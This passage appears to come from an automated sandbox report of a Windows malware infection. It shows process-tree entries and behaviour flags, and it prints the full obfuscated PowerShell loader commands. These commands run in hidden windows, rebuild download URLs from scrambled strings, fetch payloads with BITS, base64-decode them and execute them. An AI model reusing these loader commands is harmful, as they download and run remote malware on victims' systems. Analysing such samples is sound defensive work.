ybnIamb.pUdrivrSomnao se,ibild,taAgenttAnbefi Sle oSyngenExcusaWarunl .asc Medit=Tisty Kontr( Styl( EchogUngu,wPosedmBe deiJ,ggl Cale,wGla.ziKo menSifse3App,a2Ad,ok_Hagiop S,rarSamfuoGiftecFresce ParasPrevasSpi,d Pusl- IndvF Tewe DamalPFufflrBanyao ouccBr ndeNaestsPal,asDetacI H gedb ser=Bagdr$Slagg{LemogPUnexpIOut.iDRubet} Juni)Forva.WhimsCLibanoSignimOr.ctmMis iaAnlgenHand dScrubLKegleiPuckrnFagvieHauge)Herpe Broma-BiblisCentrpGrosslOptomiK kketCoext Edite[Pu ilcGe,rdhTae iaSpnderHa,al] P ol3G.und4Solso ');.($Genforeningsfest) (Geranial 'pjask$DevouiPropanDisapdJydesrS,redeSdvantAirshnScragiSpa enInhalggambi Daugh=Up.oa Opd,$.piphuCiv.ln DecrpOverrr Nordo Dy,wbInforaPerhytParisiForaaoLudfanalbumaRdse.lamant[Pl.ve$Strafu AmernXanthpGej trRegnsoScolybBlom.aFor ytUnshai Mor.oSammen Powna Broml,acch.vanddc Mu.fome.fou K.rvnLiv.ltSyge.- Reng2Fo,ty]Velan ');.($Genforeningsfest) (Geranial 'godke$b,rbaP rachrEurypi J sto RhetnbarraoTarifdBruneeUnd,tsU kylmPhaenaVictoc CrimeMigrao ri su.oplosdukse=Pa an(DisdeTFodreeDelafs .ndrtMonog-UnivePPhytiaLs intSp.tth Sten Wame$R bedT Alb,rZy,nea OvernComplsv.rknfSmkkee Tingr .onpeSpidsrSi pliBankonCeraugAlvuse G ldrTritinHjtrye SerrsFluor)Under Peppe-FigurABesttn rigidUklde u sy(Opmar[Flue.IPnhednFo git HrfrPOverptBowlirOutfi]Flabb:Datat:A,tonsFilifiAnsvazUdvlge Poyo Anise- IndsePancrqProli Fe.no8Mi,ns) Pr.b ') ;if ($Prionodesmaceous) {.$Transfereringernes $indretning;} else {;$forktret=Geranial ' Po yS St,rtRaffiaL.botr Paakt Stam-tall.BHeteriUnititappelsGrubeTSp akrInde,aPacifnMask.s DjvefUnwoeeVersirT.gnk So ub-GalloSQuat oS irruMatrorKldnic Li teCo.in Buff$ .ossA spurrTrib bCystaeOver,jDemoudTaxi s ommud F lmaTibettTermiaFamlebPost aFor.rs .ppreF.otgrCop.s Bepim-TritoD Kon eKnebrs Formt Unifi.arhon GasiaActiftBirthi Sub,oCamelnBvred Fiddl$orchiFu.heaodi,plrNonflt.qualiTe,ree P,acsAceti ';.($Genforeningsfest) (Geranial 'Bl.kk$Sal sF KonjoInde r UnfutHandliTvae eRk,bisSused= A nd$Renume,ensonE,rphvCoupe:QsupeaAtomkpOmfatpKagesdOutstaPageut SrgeaJerea ') ;.($Genforeningsfest) (Geranial 'SpillINegatmS inkp ndotoForesrLimintOverc- SpilMkennyo VestdGenneuLovbrlPla.eeIriar TilraBbassei.ompltProudsPetr,TTypesrSkrmsa HeinnUdbygsHjlpefI.ioceBiblirPrvek ') ;$Forties=$Forties+'\Pelecypod.Fru';while (-not $Garantifonde) {.($Genforeningsfest) (Geranial 'Moari$DrejeG.ogara Ce hrRat,oaSpgelnNonmatVildti Rentf,ekjeoForaanRejnedbandie,ypno=Gadit(SlurkTVadpae Ass.sUdsultAr.ll-UnderP.ivsfaKnogltOsierhMaler Doks$Non.hF ,oveoWin crLiquetkompeip,nglePokomsSky l)Lrely ') ;.($Genforeningsfest) $forktret;.($Genforeningsfest) (Geranial ' K taSM ddetMakedaHervrrRunddt Ha.m- CompSGunf.lOverbeTho.leCod,tpHyper Ferie5Totur ');$Arbejdsdatabaser=$Grundejerne[$Alangium++%$Grundejerne.count];}.($Genforeningsfest) (Geranial 'Under$Dio.eHIbrugaApplipTffe.lKassee AnstsUnorgsWoodcnKr,gseSchaps Udsks Fo.t N.rm=disal LarynGsl,ndeKommatBetal-omstdC Undeo Gro,nEtatst mejeeDistrnAntictFlles Ribbe$UopdrFIntr.oAudiorAlebitPala i sculef,skesDicer ');.($Genforeningsfest) (Geranial 'Enar.$ Hul,OAerobuTranst calosSculpkIntrai Hypep WearpUhensiAvl,hnSociagSynd Super=L.uco Quind[.ingeSSladdyPalmysUnd,rtun raehu,idmBilas.S.rjtC.eftaoIntranGoitev.exiceKemotrAnep,tT.vtb] Sc l:Tilba:CacopFB,nzarkongeoTaxacmSimshBChowra Compscombie Over6to,ed4Brod,Sirresttrnerr TrypiBeguinlifebgLat.i(Canne$AbsolHskjora Opl,pconfrlFrekveTerapsEfemesHolm nAmbuleKommusRep,gsent.s)Terri ');.($Genforeningsfest) (Geranial 'Indda$B,rgaPKlikeoR,ttelM,ltiyEctypp xteraMyalgg RevaeEnaa,dVriml Gymna= Gram Bygg[hovedSH,rtiyBlennsabasetSk,lee.rstemsewar.Uda.nTRedwie Gardx UdsptColor.Rrl.dEAb rtnSkreecLinguoSkylid Keldi Alfun RepagScoop]Su.pa:Kinet:SupprAFodgaS,haptCTestrIFejltIsnowi. SepaGGodheeBiophtPrefeSOssuat,hlorrAdganiWappen K njg I,dk(Pauli$KiropODroscuParamt.ittesTe.etkpligtiHumilpTerotpacrodiGr,sanHn,epg Eter) Adly ');.($Genforeningsfest) (Geranial 'Efeue$StatsSAccremun,aik TrapkOryzieKlororTopogsAccul1Metro3Ddni.6K,lde= Gian$ClearPHreviocontelBoligySjalsp R,suaS,mihgPr,ppe ,icad Fr,n.oscilsFolkeuForfabCurbss KroktFo berApproiRetrin EolngZaphr(Dispr2Qui k9So er1befri7U.skr8Bgre.8 Espa,S,lid2Havel4Di pl8 Opsk3Usabl7Gipsy)Deice ');.($Genforeningsfest) $Smkkers136;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ngiofe.cmd" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Exotism;++$Exotism;$Exotism=$Exotism-1;Function Cycadophyta ($Acyclically209){$Quadrable=5;$Quadrable++;For($Bakspejlets=5; $Bakspejlets -lt $Acyclically209.Length-1; $Bakspejlets+=$Quadrable){$Cousin199 = 'substring';$Gatter211=$Acyclically209.$Cousin199.Invoke($Bakspejlets, 1);$Forhandlerseminarers=$Forhandlerseminarers+$Gatter211}$Forhandlerseminarers;}$Loddets=Cycadophyta 'mye ahSalictIndretNyskap StoosNondi:Begul/Ma.ki/ UnlewtvingwDelibwBortl.PelsesBesejeTegl n UndedJumarsKafnapGevrsaSkruecIncaneUdbyt.CalcicDiauloCa,uem.asse/Semirp .evarCulexo.psig/Hy,erd CopylIndhu/Trick1Unwil8FricabForkvvLivsf2 ,chac Hegn ';$Drmmebillederne=$Loddets.split([char]62);$Loddets=$Drmmebillederne[0];$bejabbers=Cycadophyta ' SvariFreakeAztekxForfa ';$Fogyish = Cycadophyta ' Tegn\steresMicroy GuldsSendewSu meoStolpw Piro6,refl4 Read\Kri,kWbismaiBarnynRibbedtubifounluswTettysAleucPOpstyoProspw Kan eArbitr No.tSRegnbhHar.eePrdikl ,inalOpsla\ HomovAlkal1heart. Halv0Endom\stooppA,tsfoAleikw Pro,eD sunrCamphsSamfuhMechaeCityllEjbyslPost..Ody.seK.narxBiotiehavre ';.($bejabbers) (Cycadophyta ' Glam$ drueTChiffr.onenaFlagrnTillus AnkepApidaaPredirAdineeGenernHo,dacNonaseStatu=Kli.p$medleeBucklnVeletvMaski:Chiefw UniviApp.nnCredidPseudiOutkirVlg.n ') ;.($bejabbers) (Cycadophyta 'Bu.de$ FortF DrejoOsteogB ultyBritaiRomansFr,nch Bars=I.fer$PadroTUdv rr Baptascu.pn,nmarsSkraap,outoaAdderrTranseTomlen CoencKol oeReman+ Urop$ QuinF .krpoVitregKargoyin koihetersUdfrdhSy sy ') ;.($bejabbers) (Cycadophyta 'Emned$statuLEarldyTypeen nanikS.nkerDowd iHarelg m nieUdsulsBirkh sixth=Skibs Dab l(Rejse( OxidgU.trywPapilm ,dopiBands nitrow.uprei UdkrnSkr.s3Fordu2 Nona_Wo shp NoncrEkstroCrosscNegereHistos Led s Tr,n Dodoi-Ku,ulF Udbo De erPSlgerrSpredo attocBrevoeljests RegesRoshiIRummidElsiz=Beech$ asso{biliaPStrmlISnkniDUlykk}Pamfi) Best. FlygCB.cksoGuldbm PizzmfireraParannIlasrdBerriLSpic,iJomfrnOrdneecompe)dem,n Archi- onnasUdrinp,anktlDingliAssevtDisag Circ,[ ,nticKa.lihB,gliaStrk r Ddfd] ordc3Till,4Regua ');.($bejabbers) (Cycadophyta 'Sandl$Reg,lEHu.oukAtombsNonu.pSupereUntopdVanskiDagsktCib,rrPropreForskrInaccsM lfe Semi,=D.nta Sousa$PersoLParchyforsknVaabekSkrivr,xperiSkue.g.ladheBelyssBluis[Drops$ PostLHedebySchwunSaicekZobobrSiouxiTwentgPriz e rapps harm.L.oincL,keroGranuuGe,ernOmredtkalku-Saudi2 dspr]Skien ');.($bejabbers) (Cycadophyta ' Cons$ CashFOratiaAfdral,umanlBokmaiMe.slt ,otob,oeseoRefulePott rLintsnSubtyeFrontsTudeg=Alter( WrapTStud,eSynlisPaleotJung,-AfpluP Sr raProa.tIncomhOdife .ugt$f,yseFBrolgoTantagSpyssy .rgoi ,urbsF erdhJern )Gra.e To tu- KloaAF.rlinemboddFi hu Snrkl( P,ar[ DogfIMesennAn.pltCoupePUnmolt Tr,arGodtg] Kape:Techi:O,tsws Desmi IntezSkjore Me r Vildt-Appele.nderq Afsk Lystf8Spig,)Philo ') ;if ($Fallitboernes) {.$Fogyish $Ekspeditrers;} else {;$Rationen=Cycadophyta 'ResusS BladtBedazaRgtppr AffrtBall,-BehelBUnaphihvalrtOmlass N okTIdeporCarp,aOuchin FakusDiso.f,immueRadrerHjemm neuro-IntroS rescoGazp,u,spherDrsprcFinaneMazie R ppo$Wrig,LAssigoPentadRankedFi,keeT ngetBgehjs Tryk Dete,- SaarD,lyvee GransAstert StigiTrucknV.kstamic lt M,toi ZamaoOttomn S ph Basin$HusasT DernrEpt.ta B.rln SmaasRen,ep Rin.aUnentrExploeHje fnAnslaccoregeAckno ';.($bejabbers) (Cycadophyta 'Tykka$ lymTCigarrPetura MiddnVis.us.nartpChubbaHjreprDo lee AstunSnuffc.ncone Idan=Panak$.tifteParafnSkovbvA ern: Ab,taErherpA slupBalded Misaa Ker.tF rmaaDecen ') ;.($bejabbers) (Cycadophyta ' Tid,ITu,edmPantepPorteoSuperrV,rist,aste-S rppMSede,oSignadTilsmuW.enelTubereZaiba Mil eBPetaliGlobatGe,ensAgurkTLi,terTilbeaKursenEftersMa,kifintereAadserSamme ') ;$Transparence=$Transparence+'\forskolernes.Spr';while (-not $Lakatoi) {.($bejabbers) (Cycadophyta 'Effer$ Mou LClianafilthkKamala,enertRegiso DiagiAlope=Retar(S.lphT MonteBittesPl.tztLi ho-LoonlPBnkh,a spartLaulah ddan Still$p.rtiT,lsmerRevisaUa.senVenipsStoripPoinsa ,nherFlooreBinion GreycIn.eneBhm.n) Gen. ') ;.($bejabbers) $Rationen;.($bejabbers) (Cycadophyta ' extiS,irgitSnacka E ifr te ttToast- DistSUformlSyl,le M,dseSkuebp.atro Leoni5B.raa ');$Loddets=$Drmmebillederne[$Electrotonises++%$Drmmebillederne.count];}.($bejabbers) (Cycadophyta 'Towns$b rseD tere Ska.hMisdayStripd Kvlnr Ove eKe nerGnaski Ni.kn MagtgPrec eEncr,rSt,vfn NabueSelvo Wrigg=Empei Dis,uG Mi,eeCataptIntel-gendbCformao SulpnAvi st.ktorePostfnChebetJuste Curfe$In.tiTCrumprdrkl,a Sheenforhas L,ndpbronkaBrndsrOncoseTreasnSnittc Whope Co r ');.($bejabbers) (Cycadophyta 'Rilie$,usuiGkommulDruknyH,mulcMan iy Wampp Tresh InheyforsrlSyncolCl.tuiInuncn,etro O gng=Unsta Nerei[HydraStilkny .tems UnhetDsenfeMisdemTabel.FrderCVcsi,o Uh,rnConcovTralleRetsmrPhlebt ,ist] Forv:Istte:FoiblFOvercrS.andoSaucempar,fBparreaPrimasvrdsteretsh6Benhi4WindbSBlanqtAc lirKel.hiHo,elnacid gdatol(Sorro$BanquD,ynkreNeo shVaadeyTumbldMarrorPopuleStvfnrTerb.i oolnTilvegTandpeAabenr ExcenNaturefuldb)Citha ');.($bejabbers) (Cycadophyta ' Over$CornuT,onomhU,hulrSevenefre ls Wateh Late Perr=Udplu Kooki[ SprrS Reb,yTranssSabbatCerate AlummDeli,.rati TTatteeSayidxNiveatLatew.TirlsEInp tn BehacUdkigo.ekstdGummeiUnintn,pildgJocos]Cerca:n,ggi:HarmoA GldeSUnverCMicroIIde,tIArtam. IdcgGUnchee EmentForsvS OrthtRecogrCerauiRiv gnB,varg Che,(Totif$KatriG,ariflTrypay TatocMedreyNys apKursihUdkomy Gladl DatelSyncoi SkornExort)Betnk ');.($bejabbers) (Cycadophyta 'Yakok$Gehe RL gede .ecocCompri,tvfrtIndec=Ich.e$HansaTFustihtankvr ,uoreKargosDronnh Konc.Get,esPalatu SkanbCro.ksOverbt askrD.augiZ,ggin Bir.g.ikse(Gi,ne3Aftrk1Bubin0t rti2Undvr7.denl5 Smil,,ilet2Obdur5Fisse5Degen0Thoug2 Val,)Diffe ');.($bejabbers) $Recit;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Exotism;++$Exotism;$Exotism=$Exotism-1;Function Cycadophyta ($Acyclically209){$Quadrable=5;$Quadrable++;For($Bakspejlets=5; $Bakspejlets -lt $Acyclically209.Length-1; $Bakspejlets+=$Quadrable){$Cousin199 = 'substring';$Gatter211=$Acyclically209.$Cousin199.Invoke($Bakspejlets, 1);$Forhandlerseminarers=$Forhandlerseminarers+$Gatter211}$Forhandlerseminarers;}$Loddets=Cycadophyta 'mye ahSalictIndretNyskap StoosNondi:Begul/Ma.ki/ UnlewtvingwDelibwBortl.PelsesBesejeTegl n UndedJumarsKafnapGevrsaSkruecIncaneUdbyt.CalcicDiauloCa,uem.asse/Semirp .evarCulexo.psig/Hy,erd CopylIndhu/Trick1Unwil8FricabForkvvLivsf2 ,chac Hegn ';$Drmmebillederne=$Loddets.split([char]62);$Loddets=$Drmmebillederne[0];$bejabbers=Cycadophyta ' SvariFreakeAztekxForfa ';$Fogyish = Cycadophyta ' Tegn\steresMicroy GuldsSendewSu meoStolpw Piro6,refl4 Read\Kri,kWbismaiBarnynRibbedtubifounluswTettysAleucPOpstyoProspw Kan eArbitr No.tSRegnbhHar.eePrdikl ,inalOpsla\ HomovAlkal1heart. Halv0Endom\stooppA,tsfoAleikw Pro,eD sunrCamphsSamfuhMechaeCityllEjbyslPost..Ody.seK.narxBiotiehavre ';.($bejabbers) (Cycadophyta ' Glam$ drueTChiffr.onenaFlagrnTillus AnkepApidaaPredirAdineeGenernHo,dacNonaseStatu=Kli.p$medleeBucklnVeletvMaski:Chiefw UniviApp.nnCredidPseudiOutkirVlg.n ') ;.($bejabbers) (Cycadophyta 'Bu.de$ FortF DrejoOsteogB ultyBritaiRomansFr,nch Bars=I.fer$PadroTUdv rr Baptascu.pn,nmarsSkraap,outoaAdderrTranseTomlen CoencKol oeReman+ Urop$ QuinF .krpoVitregKargoyin koihetersUdfrdhSy sy ') ;.($bejabbers) (Cycadophyta 'Emned$statuLEarldyTypeen nanikS.nkerDowd iHarelg m nieUdsulsBirkh sixth=Skibs Dab l(Rejse( OxidgU.trywPapilm ,dopiBands nitrow.uprei UdkrnSkr.s3Fordu2 Nona_Wo shp NoncrEkstroCrosscNegereHistos Led s Tr,n Dodoi-Ku,ulF Udbo De erPSlgerrSpredo attocBrevoeljests RegesRoshiIRummidElsiz=Beech$ asso{biliaPStrmlISnkniDUlykk}Pamfi) Best. FlygCB.cksoGuldbm PizzmfireraParannIlasrdBerriLSpic,iJomfrnOrdneecompe)dem,n Archi- onnasUdrinp,anktlDingliAssevtDisag Circ,[ ,nticKa.lihB,gliaStrk r Ddfd] ordc3Till,4Regua ');.($bejabbers) (Cycadophyta 'Sandl$Reg,lEHu.oukAtombsNonu.pSupereUntopdVanskiDagsktCib,rrPropreForskrInaccsM lfe Semi,=D.nta Sousa$PersoLParchyforsknVaabekSkrivr,xperiSkue.g.ladheBelyssBluis[Drops$ PostLHedebySchwunSaicekZobobrSiouxiTwentgPriz e rapps harm.L.oincL,keroGranuuGe,ernOmredtkalku-Saudi2 dspr]Skien ');.($bejabbers) (Cycadophyta ' Cons$ CashFOratiaAfdral,umanlBokmaiMe.slt ,otob,oeseoRefulePott rLintsnSubtyeFrontsTudeg=Alter( WrapTStud,eSynlisPaleotJung,-AfpluP Sr raProa.tIncomhOdife .ugt$f,yseFBrolgoTantagSpyssy .rgoi ,urbsF erdhJern )Gra.e To tu- KloaAF.rlinemboddFi hu Snrkl( P,ar[ DogfIMesennAn.pltCoupePUnmolt Tr,arGodtg] Kape:Techi:O,tsws Desmi IntezSkjore Me r Vildt-Appele.nderq Afsk Lystf8Spig,)Philo ') ;if ($Fallitboernes) {.$Fogyish $Ekspeditrers;} else {;$Rationen=Cycadophyta 'ResusS BladtBedazaRgtppr AffrtBall,-BehelBUnaphihvalrtOmlass N okTIdeporCarp,aOuchin FakusDiso.f,immueRadrerHjemm neuro-IntroS rescoGazp,u,spherDrsprcFinaneMazie R ppo$Wrig,LAssigoPentadRankedFi,keeT ngetBgehjs Tryk Dete,- SaarD,lyvee GransAstert StigiTrucknV.kstamic lt M,toi ZamaoOttomn S ph Basin$HusasT DernrEpt.ta B.rln SmaasRen,ep Rin.aUnentrExploeHje fnAnslaccoregeAckno ';.($bejabbers) (Cycadophyta 'Tykka$ lymTCigarrPetura MiddnVis.us.nartpChubbaHjreprDo lee AstunSnuffc.ncone Idan=Panak$.tifteParafnSkovbvA ern: Ab,taErherpA slupBalded Misaa Ker.tF rmaaDecen ') ;.($bejabbers) (Cycadophyta ' Tid,ITu,edmPantepPorteoSuperrV,rist,aste-S rppMSede,oSignadTilsmuW.enelTubereZaiba Mil eBPetaliGlobatGe,ensAgurkTLi,terTilbeaKursenEftersMa,kifintereAadserSamme ') ;$Transparence=$Transparence+'\forskolernes.Spr';while (-not $Lakatoi) {.($bejabbers) (Cycadophyta 'Effer$ Mou LClianafilthkKamala,enertRegiso DiagiAlope=Retar(S.lphT MonteBittesPl.tztLi ho-LoonlPBnkh,a spartLaulah ddan Still$p.rtiT,lsmerRevisaUa.senVenipsStoripPoinsa ,nherFlooreBinion GreycIn.eneBhm.n) Gen. ') ;.($bejabbers) $Rationen;.($bejabbers) (Cycadophyta ' extiS,irgitSnacka E ifr te ttToast- DistSUformlSyl,le M,dseSkuebp.atro Leoni5B.raa ');$Loddets=$Drmmebillederne[$Electrotonises++%$Drmmebillederne.count];}.($bejabbers) (Cycadophyta 'Towns$b rseD tere Ska.hMisdayStripd Kvlnr Ove eKe nerGnaski Ni.kn MagtgPrec eEncr,rSt,vfn NabueSelvo Wrigg=Empei Dis,uG Mi,eeCataptIntel-gendbCformao SulpnAvi st.ktorePostfnChebetJuste Curfe$In.tiTCrumprdrkl,a Sheenforhas L,ndpbronkaBrndsrOncoseTreasnSnittc Whope Co r ');.($bejabbers) (Cycadophyta 'Rilie$,usuiGkommulDruknyH,mulcMan iy Wampp Tresh InheyforsrlSyncolCl.tuiInuncn,etro O gng=Unsta Nerei[HydraStilkny .tems UnhetDsenfeMisdemTabel.FrderCVcsi,o Uh,rnConcovTralleRetsmrPhlebt ,ist] Forv:Istte:FoiblFOvercrS.andoSaucempar,fBparreaPrimasvrdsteretsh6Benhi4WindbSBlanqtAc lirKel.hiHo,elnacid gdatol(Sorro$BanquD,ynkreNeo shVaadeyTumbldMarrorPopuleStvfnrTerb.i oolnTilvegTandpeAabenr ExcenNaturefuldb)Citha ');.($bejabbers) (Cycadophyta ' Over$CornuT,onomhU,hulrSevenefre ls Wateh Late Perr=Udplu Kooki[ SprrS Reb,yTranssSabbatCerate AlummDeli,.rati TTatteeSayidxNiveatLatew.TirlsEInp tn BehacUdkigo.ekstdGummeiUnintn,pildgJocos]Cerca:n,ggi:HarmoA GldeSUnverCMicroIIde,tIArtam. IdcgGUnchee EmentForsvS OrthtRecogrCerauiRiv gnB,varg Che,(Totif$KatriG,ariflTrypay TatocMedreyNys apKursihUdkomy Gladl DatelSyncoi SkornExort)Betnk ');.($bejabbers) (Cycadophyta 'Yakok$Gehe RL gede .ecocCompri,tvfrtIndec=Ich.e$HansaTFustihtankvr ,uoreKargosDronnh Konc.Get,esPalatu SkanbCro.ksOverbt askrD.augiZ,ggin Bir.g.ikse(Gi,ne3Aftrk1Bubin0t rti2Undvr7.denl5 Smil,,ilet2Obdur5Fisse5Degen0Thoug2 Val,)Diffe ');.($bejabbers) $Recit;}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ncehlk.cmd" "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "++$Gutted;++$Gutted;$Gutted=$Gutted-1;Function Ayegreen ($Organiserende76){$Heterochrony=5;$Heterochrony++;For($Unexceptionableness122=5; $Unexceptionableness122 -lt $Organiserende76.Length-1; $Unexceptionableness122+=$Heterochrony){$Repetitiousness = 'substring';$Disgaveled=$Organiserende76.$Repetitiousness.Invoke($Unexceptionableness122, 1);$Paratomium=$Paratomium+$Disgaveled}$Paratomium;}$Jakkelomme9=Ayegreen 'LessehUd.iktasyndtKurvepRo.ansOpso,:M.lit/ Pern/U,corkPeo,li Cenes DidyaBrddenSk mpb AnseeMonogtIn hehsalgsaSpredk Ka.o.Kotelc Hento,ripemProte/ Ost.KBoced/Fr.psA HumerZi.pic .evetTmreriUndric BibliElamizungode Unde1Sport1Ranci9B.swe.DecidxKu,tot tstopDetal ';$Vidnegodtgrelse=$Jakkelomme9.split([char]62);$Jakkelomme9=$Vidnegodtgrelse[0];$Kandidatfests34=Ayegreen 'Unormi ForbeContaxCin.a ';$spurveungen = Ayegreen ' croq\AfgansSupery FenasBanepwModgaoTepirw,ring6Wh.ck4secul\SnuffW EpheiS.egenbortrdInforo BegrwSebolsExhauPBlegnoYahwewGentieMeatwrRockoSEmitthTilspeListelTe,eplJumbo\HeptavV.nte1.onot.genne0 gel\ ForepUninsoAffinw Sk ie TeksrPi.wisCentrhSmer eKlaptl MendlAssi .Gedebe Skydx ,odee Faki ';.($Kandidatfests34) (Ayegreen 'grain$kundeRsmr.ooTilkaeTilsinstagsdHellie Sukk= Noni$Pe,rleAcclinChabavDurat:GomlawBoligiLeuconDisabd Gan iGenerrskrms ') ;.($Kandidatfests34) (Ayegreen 'Softw$Ind.ns,ecoup M,pguKimblr rummvbak.eeSlaviuFatten By egRerine NeurnE,yth= Impr$DefibR SkiloGaspre.ountnReg,ndWep rePaga,+Scler$E hvesForstp TrinuDerf,rRedfivomganeOverguPo opnpridig.repaeReklan Subo ') ;.($Kandidatfests34) (Ayegreen ' Pa r$mer eM Pla a T,iml RapsaMultirun cci C.nnaN.isepOmarbrbusseoKvindoBeregfSemin1Jabbl8 F.ue subse= ooft Cronu( Set ( Forug ConswAskovmslugviZardm InkliwArbeji Dr.pnUnabi3Lsepr2Suffi_ Ge,npAwardrKummeoTuefoc.eauteFamilsDggels Unhy Infor-EarleFAfmaa DybdePDanskrsagasoPig.bcTilkoeRaglesRenovsNon.xIStd.udTerro=Misun$ Fall{FeathP TilsIDasseDFolia} U.de)Dddru.SvippCpilaso igsamdobbemHefteaJonglnIb.ugdMea,oLSkrueiHovednTrekbeFiefd)Skibs S,egn-SlentsUdda,pMrkbll FairiPa ift Lith ophv[ ForfcBebudhWisela.roker redi]Forbe3Trans4Overf ');.($Kandidatfests34) (Ayegreen 'Biolo$RhizoSSkattuAlquinParetdUndera Flakn Du te RedisC,itteGig a rops= Mali Temp,$ ImpeM.eseraSmirklattacaEnogtrHassei tilbaElskopHjemfrtve,aoFavreoD,taafFabah1Cicat8Perti[Coest$ Red,M lokaaKreeplTnde aPolitrClassi AastaMastepPatterUnorgo Lo.toP.ecif Lou 1 Pulp8 Ufr .AnkepcRituao Dem,uChiegnEud.dtpyth.-Infar2,eume]Crios ');.($Kandidatfests34) (Ayegreen 'Snows$FornuSReifikDissei,eennfAdmontTa.tenAmpliiRnulfnSiameg D ypeSuperr IncosFicus=Kv,pr( FibeT ulfoeDegensMilitt Rea,-TattoPSpontaStodgtDe inhBiogr cean$ ,ynnsVrdi.pDiapauRe,ndrSkattv nonee ErhvuPrecon avilgConfuestiksn F,re)H,pni Bu.le-Vol pAConvenI defdTndem Kontu(Dagp.[PedicIDiskenSgelitE.kliPK nontBesejrTands]Saddu:Uvorn:unressWedgiiCoalmzP ismeVinbj Runds-Gennee Sk lq ,lep Undvi8Knowl)Trop ') ;if ($Skiftningers) {.$spurveungen $Sundanese;} else {;$Pagodens=Ayegreen 'Pal.oS MarmtA,krvaCinderIlle,tstrbe-DisocB Sikli Belut,aandsLoo,fT workr ,toraSelvsnFact.s CyrefGaasee.lagtr Terv ryc- u,psS vestoKatolu ClubrRatiocVestue U ph Ho.e$UntwiJNoncraMinimkNonalkIndereKaurylBlaiso DorsmBrainmR.mineVider9Besud Skald-UranoD,irioePla isPreextRe.eki ynopnForklaFugtstK,lloiTvekno Vin,n okke Ter,s$ Shi RVaaseoResseeBasidnIlanddBorere Fria ';.($Kandidatfests34) (Ayegreen ' Udru$ abbeR.artioYear,e Bulbnhundid BgereErhve=Bl,ck$Sv,keeAab.inP.ldev Pra,:KaramaRispepIn,grp AssudK.kseaAage tProthaBalle ') ;.($Kandidatfests34) (Ayegreen 'PandeI ,animNsectpC.lvaoK spurLysertChado-SubprMManufoPee,edVgteru AkutlStempeSu.er FdselBBohaviRom ntMelles Afl T ProerChacoaSvm,en reasKontrf,emireTallirNonre ') ;$Roende=$Roende+'\Ws.Tro';while (-not $Konomicheferne) {.($Kandidatfests34) (Ayegreen 'T.nna$Expe K Am.soPostenInspeoReinvm.usbaiB nescTiddlh LeaveSpongfSecr,eDistrrIntranSlageeTomas=neste(UnhusTKulmueS ccesPupattBesti-EpiloPGobelaJonahtViv.fh Ex m regnf$GroutRTalefoUndepeSatirn LazadHjem eKomm,)kale. ') ;.($Kandidatfests34) $Pagodens;.($Kandidatfests34) (Ayegreen 'Begi SPreext AnglaVe.barLaelatCanna-N.mphS Oliel CampenonvieSharppSkarp Exter5Langs ');$Jakkelomme9=$Vidnegodtgrelse[$Skamferede++%$Vidnegodtgrelse.count];}.($Kandidatfests34) (Ayegreen '.laxb$LagomlK,tasi Refot Pathh.nymooNonp,pHygroh Benzy raadt sciuoRygeruSo.mesomfor Defun= Vild TankvGFo,breMastutFirea-Dr,ptC Ph.no Aut n AarstThro e apitnDuodetfu,pe Jgers$ HjrnRChaetoDecoceScrapnSublid Coene,orgr ');.($Kandidatfests34) (Ayegreen ' Espr$ ResoU ForpdSejtrfEstimo As orNordsiPrfabnSneg gsongwe.leninMedfasE.egi8 El,k9 M.no Ign.t=Farve Disku[W.gglSStor,y H rbs.adsit.lecieDisemmnone,.SprinC igteoGen.rnKaffevToldkeFors.r aanet Bevi]Tilel:struk:Yuqu.Fu enrr Ambiorejfem.andsBRestoa Kants estreAltsa6Bulbi4For.mSManustLadler,ktivi ,ignnaabengP,ede( Mu d$RenovlRokkei wa.etfemmeh,alisoAlvorp SpekhHj.mbyVir,ctre.leoBortfu Choks Mili)Udled ');.($Kandidatfests34) (Ayegreen 'Sagom$ LaodLSaccheRu.olsNedtos Od foSmuglnTv,ngsO gan Sjatt=Sprin Inter[TitraS Ostey,verisO,erltComp,eSkrmimNomad. Agi.Tprim.eHame.xIde tt arb..U alaEBrnehnVurdecBastooUpfl.d Extei antanN,nacg kage]Wharf: Over:st,beASvbesSSanikCRoy.tILyrerIFugtd.StimeGFdselePerictAfholS.isret StifrStotgi,eddynPo,tigPo.ta(Lun.b$ManifU ForsdBantufRelakoMglerrChloriUnc,nnSondegCoalse ussenIntersStedm8Stee 9Flags) I,at ');.($Kandidatfests34) (Ayegreen ' etr$HerreDIndena aarhh MammlEpideeSvalerSynsruExplapFinla= Unde$ThesmLSyllae Skols FrissTindeoStan noplg.sNavig.N.dsks remeuVildbb ndkrsAlbaetolerar,andtiOpjusnFortvgOlier( Leve3Telli0P nkt7Slgts2Havan2Re le2Forre,Ove v2emi,i5una,s3Su.er6Betal7Tiend)Micro ');.($Kandidatfests34) $Dahlerup;}"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
